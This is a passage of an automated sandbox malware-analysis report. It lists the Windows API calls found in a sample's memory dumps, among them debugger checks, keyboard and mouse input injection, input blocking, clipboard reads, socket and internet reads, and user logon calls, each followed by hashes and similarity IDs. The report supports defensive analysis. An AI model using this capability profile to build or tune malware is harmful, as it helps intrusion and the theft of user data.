• FindNextFileW.KERNEL32(?,?), ref: 004525E9
• FindClose.KERNEL32(?), ref: 004525FF
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
• String ID: *.*$\VH
• API String ID: 2786137511-2657498754
• Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
• Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
• Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
• Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
APIs
• IsDebuggerPresent.KERNEL32 ref: 00421FC1
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
• UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
• GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
• TerminateProcess.KERNEL32(00000000), ref: 00422004
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID: pqI
• API String ID: 2579439406-2459173057
• Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
• Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
• Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
• Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
APIs
• __wcsicoll.LIBCMT ref: 00433349
• mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
• __wcsicoll.LIBCMT ref: 00433375
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: __wcsicollmouse_event
• String ID: DOWN
• API String ID: 1033544147-711622031
• Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
• Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
• Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
• Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
APIs
• GetKeyboardState.USER32(?), ref: 0044C3D2
• SetKeyboardState.USER32(00000080), ref: 0044C3F6
• PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
• PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
• SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: KeyboardMessagePostState$InputSend
• String ID:
• API String ID: 3031425849-0
• Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
• Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
• Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
• Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
• WSAGetLastError.WSOCK32(00000000), ref: 00476692
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
• Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
• Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
• Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
• Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
APIs
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• IsWindowVisible.USER32 ref: 0047A368
• IsWindowEnabled.USER32 ref: 0047A378
• GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
• IsIconic.USER32 ref: 0047A393
• IsZoomed.USER32 ref: 0047A3A1
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
• Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
• Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
• Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
APIs
  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
• CoInitialize.OLE32(00000000), ref: 00478442
• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
• CoUninitialize.OLE32 ref: 0047863C
Strings
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
• Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
• Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
• Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_x.jbxd
Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• String ID:
• API String ID: 15083398-0
• Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
• Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
• Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
• Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: U$\
                                                                                              • API String ID: 4104443479-100911408
                                                                                              • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                              • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                              • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                              • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 3541575487-0
                                                                                              • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                              • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                              • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                              • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                              • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                                              • String ID:
                                                                                              • API String ID: 48322524-0
                                                                                              • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                              • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                              • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                              • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                              APIs
                                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                              • String ID:
                                                                                              • API String ID: 901099227-0
                                                                                              • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                              • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                              • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                              • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                              APIs
                                                                                              • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Proc
                                                                                              • String ID:
                                                                                              • API String ID: 2346855178-0
                                                                                              • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                              • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                              • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                              • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                              APIs
                                                                                              • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlockInput
                                                                                              • String ID:
                                                                                              • API String ID: 3456056419-0
                                                                                              • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                              • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                              • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                              • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                              APIs
                                                                                              • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: LogonUser
                                                                                              • String ID:
                                                                                              • API String ID: 1244722697-0
                                                                                              • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                              • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                              • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                              • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID:
                                                                                              • API String ID: 2645101109-0
                                                                                              • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                              • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                              • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                              • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
